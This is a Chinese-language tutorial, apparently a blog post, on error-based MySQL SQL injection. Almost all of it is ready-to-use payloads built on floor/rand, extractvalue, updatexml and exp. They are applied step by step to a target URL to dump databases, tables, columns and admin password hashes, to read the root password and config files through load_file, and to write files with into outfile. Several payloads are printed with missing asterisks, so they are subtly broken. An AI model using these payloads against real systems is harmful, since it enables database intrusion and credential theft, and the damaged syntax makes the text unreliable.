mysql在执行 SQL语句的时 如果语句有错 会返回报错信息,在与php结合使用的时候默认并不会把报错的信息在页面显示出来。
如果要在php显示出来 将在执行语句的时候使用mysql_error() 才可以把错误的信息 显示到页面。
$result=mysql_query(“select * from article where id=$id”) or die(mysql_error());
1.一些报错语句
1.通过floor暴错
/数据库版本/
and(select 1 from(select count(),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
/简单办法暴库/
/连接用户/
and(select 1 from(select count(),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
/连接数据库/
and(select 1 from(select count(),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
/暴库/
and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
/暴表/
and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
/暴字段/
and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
/暴内容/
and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
实例:
当前用户名
http://target_sys.com/mysqlinj.php?id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))
root密码
http://target_sys.com/mysqlinj.php?id=1 and (extractvalue(1,concat(0x7e,(select password from mysql.user),0x7e)))
查询库
http://target_sys.com/mysqlinj.php?id=-1 and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
查询第二个库
http://target_sys.com/mysqlinj.php?id=1 and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
把 ROM information_schema.schemata LIMIT 1,1) 这个部分的 1 一直往后推也可以得到所有库的名
target_sys
查询表
http://target_sys.com/mysqlinj.php?id=-1 and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
第二个表
http://target_sys.com/mysqlinj.php?id=-1 and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
查询字段
查询 admin的表 首先把admin 转换成十六进制 再放到语句去
http://target_sys.com/mysqlinj.php?id=-1 and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
查询第二个字段 0x61646D696E LIMIT 0,1 这个0 往后推
http://target_sys.com/mysqlinj.php?id=-1 and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
查询数据
http://target_sys.com/mysqlinj.php?id=-1 and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
有时候这个方法不行,搞下面的
updatexml方法查询数据
http://target_sys.com/mysqlinj.php?id=-1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)
上面这种查询 只能查询32位 所以有些部分查询不出来。可以先查询密文 或者先查询长度的 再进行字符长度的截取。
http://target_sys.com/mysqlinj.php?id=-1 and updatexml(1,concat(0x7e,(SELECT distinct LENGTH(concat(0x23,username,0x3a,password,0x23)) FROM admin limit 0,1),0x7e),1)
LENGTH 函数 查询的长度为40
SUBSTRING()字符串截取函数
查询 1-32
http://target_sys.com/mysqlinj.php?id=-1 and updatexml(1,concat(0x7e,(SELECT distinct SUBSTRING(concat(0x23,username,0x3a,password,0x23),1,32) FROM admin limit 0,1),0x7e),1)
admin:e10adc3949ba59abbe56e057
查询32-40
http://target_sys.com/mysqlinj.php?id=-1 and updatexml(1,concat(0x7e,(SELECT distinct SUBSTRING(concat(0x23,username,0x3a,password,0x23),33,40) FROM admin limit 0,1),0x7e),1)
f20f883e
再后将字符并接起来就是完整的的数据
admin:e10adc3949ba59abbe56e057f20f883e
报错读取写入文件
extractvalue 读取文件
http://target_sys.com/mysqlinj.php?id=-1 and (extractvalue(1,concat(0x7e,(select load_file(‘C:\inetpub\wwwroot\target_sys.com\data\config.inc.php’)),0x7e)))
最好用这个,读取的内容多,上面的方法读取的文件长度只有32位
exp方法读取
http://target_sys.com/mysqlinj.php?id=1 and (exp(~(select*from(select load_file(‘C:\inetpub\wwwroot\target_sys.com\data\config.inc.php’))a)));
写文件
http://target_sys.com/mysqlinj.php?id=-1 and exp(~(selectfrom(select ‘hello’)a)) into outfile ‘C:\inetpub\wwwroot\target_sys.com\data\config.inc.txt’;
*写文件默认就是只能写入0到文件里面 。
若有收获,就点个赞吧
0 人点赞
